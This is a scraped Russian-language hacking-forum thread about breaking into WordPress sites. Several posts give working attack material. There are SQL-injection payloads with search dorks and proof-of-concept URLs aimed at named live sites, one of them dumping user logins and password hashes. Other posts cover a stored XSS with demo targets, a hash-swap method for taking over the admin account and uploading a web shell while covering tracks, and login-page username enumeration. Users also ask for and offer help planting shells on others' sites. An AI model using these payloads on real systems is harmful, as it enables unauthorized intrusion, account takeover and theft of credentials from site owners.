[ Обзор уязвимостей WordPress ]

Discussion in 'Веб-уязвимости' started by ettee, 5 Oct 2007.

  1. Coder +++

    Coder +++ Elder - Старейшина

    Joined:
    24 May 2011
    Messages:
    111
    Likes Received:
    25
    Reputations:
    13
    можно поподробней или линк на статью.
     
  2. total90

    total90 Elder - Старейшина

    Joined:
    30 Sep 2009
    Messages:
    90
    Likes Received:
    85
    Reputations:
    12
    Редактируй файлы плагинов, либо лей тему
     
  3. Coder +++

    Coder +++ Elder - Старейшина

    Joined:
    24 May 2011
    Messages:
    111
    Likes Received:
    25
    Reputations:
    13
    Там нужен доступ к фтп.
     
  4. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Раскрытие путей wp <= 3.4.1
     
    _________________________
  5. 3ak.aT

    3ak.aT Banned

    Joined:
    1 Dec 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    WordPress Front End Upload v0.5.4.4 Arbitrary PHP File Upload

    Кто разобрался с вот этой уязвимостью? тыЦ

    Плагин много где установлен, но почему то страница upload.php при прямом открытие выдаёт: _RANDOM NUMBER
     
  6. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Как можно зайти под админом\залить шел, если
    1)Есть доступ к бд = есть логи и пасс(мд5) админа
    2)Версия движка 2.5.1
    3)Секрет кей не дефолтный

    Спасибо заранее
     
  7. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    1.Расшифровать пароль!
    2.????
    3.PROFIT!!!11

    Иных вариантов нет исходя из ваших данных. Можете протроянить админа и узнать пароль, не прибегая к расшифровке!
     
  8. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862


    Моя бы схема выглядела так:

    1) Есть доступ в бд, но нет расшифрованного пасса? Нет проблем!

    Заходим в БД. Пишем запрос

    Code:
    select password from users where id=1
    Запоминаем/записываем хэшик.

    Далее запрашиваем

    Code:
    update users set password='NewPassword' where id=1
    NewPassword можно взять из любых расшифрованных ВордПресс хэшей. Например в этом сообщении

    2) Проверяем, что у нашего юзверя сменился хэшик в БД.

    3) site/wp-login.php - логин мы знаем, пасс расшифрованный тоже. Спасибо ВП что ещё соль не надо апдейтить (хотя это +1 запрос к бд, не новички смогут и 1 запросом апдейт сделать)

    4) Так как мы внутри - льём шелл, например так

    5) Из-под шелла или ещё где цепляемся в бд и делаем запрос

    Code:
     update users set password='OldPassword' where id=1
    Где OldPassword = старый, сохранённый хэшик.


    З.Ы. Прикольно жёлтый цвет на мрачном фоне смотрится =)
     
    _________________________
  9. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    :D не лезит)
     
  10. 2nikola

    2nikola New Member

    Joined:
    16 Jul 2012
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    WendM напиши в личку логин и хеш залью шелл
     
  11. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Помошник брута

    Дело в том что, чем дальше я влажу в ядро движка, тем больше радуюсь тому, что билдеры как-будто специально оставляют нам шансы на проникновение. Сегодня обратил внимание на wp-login.php
    Дело в том, что WP позволяет отображать ник, как того пожелает сам автор, отнюдь, не всегда админ использует логин "admin". Довольно часто приходится брутить... Но как же брутить, если мы не знаем логин админа? В этом нам помогает движок. Дело в том, что скрипт сам помогает нам найти логин админа с помощью того же брута. Возьмем случайны блог и гугла.
    PHP:
    http://domashenko.ru/wp-login.php
    Введем в качестве логина "superuser", а в качестве пасса "123". На что получим подсказку, что юзера с ником "superuser" в базе нет....
    [​IMG]
    Введем логин "admin" и пароль к примеру "test", в результате получаем:
    [​IMG]
    Конечно не новшество, но мне частенько пригождается.
     
    _________________________
  12. Asin

    Asin New Member

    Joined:
    28 Oct 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Один из первых шагов по безопасности Wordpress смена страницы входа в админку - wp-login.php
     
  13. Planet85

    Planet85 New Member

    Joined:
    15 Aug 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста, как использовать полученные при помощи программы WP_Cracker логин и хэш? чтобы редактировать сайт
     
  14. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Как создатель софтины - советую прочитать отдельную тему по ней тут
     
    _________________________
    1 person likes this.
  15. tvano0

    tvano0 New Member

    Joined:
    11 Oct 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    вопрос, есть админка, темы и плагины нельзя с неё редактировать.
    какие еще методы есть чтоб залить шел? вп 3.4.1
     
  16. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    fs real estate plugin SQL-Inj

    # Exploit Title: fs real estate plugin SQL-Inj
    # Date: Oct 2, 2012
    # Exploit Author: z0mbyak
    # Vendor Homepage: find by yourself
    # Software Link: find by yourself
    # Version: don't know
    # Tested in: web

    # Dork: inurl:"marker_listings.xml?id"

    # Exploit: -2+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
    # PoC:
    http://themacnabs.com/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=-2+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--

    P.S. Кол-во колонок может отличаться...
    P.P.S. Мб, боян, по wp не работаю)
     
    2 people like this.
  17. ukrpunk

    ukrpunk Member

    Joined:
    31 Oct 2011
    Messages:
    47
    Likes Received:
    14
    Reputations:
    5
    # Exploit Title: ripe-hd-player SQL-Inj
    # Date: 19.10.2012
    # Exploit Author: ukrpunk
    # Vendor Homepage: find by yourself
    # Software Link: find by yourself
    # Version: don't know
    # Tested in: web

    # Dork:inurl:"/plugins/ripe-hd-player"

    # Exploit:-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12,13,14,15,16,17+from+wp_users--

    # PoC: http://www.fitness-bucuresti.ro/wp-content/plugins/ripe-hd-player/config.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12,13,14,15,16,17+from+wp_users--
     
    #237 ukrpunk, 19 Oct 2012
    Last edited: 19 Oct 2012
    1 person likes this.
  18. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    народ, кто в курсе как залить шелл в wp 3.4.2 ?
     
  19. Ups

    Ups Member

    Joined:
    11 Apr 2011
    Messages:
    113
    Likes Received:
    12
    Reputations:
    0
    Через шаблоны.
     
  20. 3ak.aT

    3ak.aT Banned

    Joined:
    1 Dec 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Кто нибудь объяснит как раскрутить эту тему:
    PHP:
    ###################################################################################
     
    # Exploit Title: wordpress Count per Day Cross Site Scripting Vulnerability
    #
    # Google Dork:inurl:/wp-content/plugins/count-per-day
    #
    # Date: 08/24/2012
    #
    # Author: Crim3R
    #
    # Version 3.2.3
    #
    # Vendor Home : http://downloads.wordpress.org/plugin/count-per-day.3.2.3.zip
    #
    # Tested on: all
    #
    ###################################################################################
     
    $
    $        
    Author will be not responsible for any damage.
    $
    ###################################################################################
     
      
    ========================================
    first notes.php is not restricted to admin and anyone can access it directty by 
    browser 
    => an attacker can add notes witch 
     
    can be html codes 
    => its Stored Xss
    goto WP-path/wp-content/plugins/count-per-day/notes.php
    in the notes section add html code 
    and click Add
    D3M0 

    http://www.christinedesavino.com/blog/wp-content/plugins/count-per-day 
     
    http://www.dhakadakshinghsc.com/wp-content/plugins/count-per-day/
     
    www.watansport.net/ara/wp-content/plugins/count-per-day/
     
     
    ===============
    Crim3R@Att.Net===========
     
    $home = %00
    thanks to 
    :  2MzRp Mikili 0x0ptim0us iC0d3R farbodmahini Amir